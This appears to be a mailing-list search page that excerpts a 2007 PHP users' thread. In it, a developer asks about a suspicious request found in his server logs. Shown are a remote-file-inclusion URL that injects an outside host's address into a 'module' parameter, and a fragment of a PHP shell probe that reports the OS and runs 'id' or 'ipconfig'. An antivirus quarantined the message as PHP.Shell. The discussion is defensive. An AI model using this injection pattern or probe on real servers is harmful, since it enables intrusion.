On 10/5/07, Paul Scott <[EMAIL PROTECTED]> wrote:
>
> On Fri, 2007-10-05 at 11:29 -0400, Daniel Brown wrote:
> > Yeah, honestly I wasn't sure if it was an injection attack or if
> > those URLs were referrers in the logs.
>
> OK sorry if I wasn't 100% clear here, but the logs showed up something
On Fri, 2007-10-05 at 11:29 -0400, Daniel Brown wrote:
> Yeah, honestly I wasn't sure if it was an injection attack or if
> those URLs were referrers in the logs.
OK sorry if I wasn't 100% clear here, but the logs showed up something
like:
http://fsiu.uwc.ac.za/index.php?module=http://www.go
Daniel Brown wrote:
Yeah, honestly I wasn't sure if it was an injection attack or if
those URLs were referrers in the logs.
If you hit the first URL ( http://www.vesprokat.ru/n ) with, say
lynx, you get that script coming up. So it could've been referral
hits. Which could mean the r
On 10/5/07, Ashley M. Kirchner <[EMAIL PROTECTED]> wrote:
> Daniel Brown wrote:
> > The biggest issue does still remain: if this is on your local
> > system, you need to figure out exactly how it got there in the first
> > place
> I thought the OP said he noticed it in his logs... I unders
Daniel Brown wrote:
The biggest issue does still remain: if this is on your local
system, you need to figure out exactly how it got there in the first
place
I thought the OP said he noticed it in his logs... I understood
that as someone cleverly trying to inject it somehow and it ended u
On 10/5/07, Paul Scott <[EMAIL PROTECTED]> wrote:
>
> On Fri, 2007-10-05 at 07:38 -0600, Ashley M. Kirchner wrote:
> > Quarantine Messages:
> > Message quarantined because of virus: PHP.Shell.
> >
> > Someone saw it somewhere and reported it...
>
> Don't you love Free Software?
On Fri, 2007-10-05 at 07:38 -0600, Ashley M. Kirchner wrote:
> Quarantine Messages:
> Message quarantined because of virus: PHP.Shell.
>
> Someone saw it somewhere and reported it...
Don't you love Free Software? ;)
--Paul
All Email originating from UWC is covered by discla
Paul Scott wrote:
I am taking a quick look through the access logs on our dev box, and
came across this little nasty that was trying to execute itself as a XSS
attack(?)
Interestingly enough, MimeDefang/ClamAV quarantined your message
because of that script:
Quarantine Messages:
I am taking a quick look through the access logs on our dev box, and
came across this little nasty that was trying to execute itself as a XSS
attack(?)
";
echo "SysOSx:$ker";
echo "SysOSx:$osx";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;
9 matches
Mail list logo
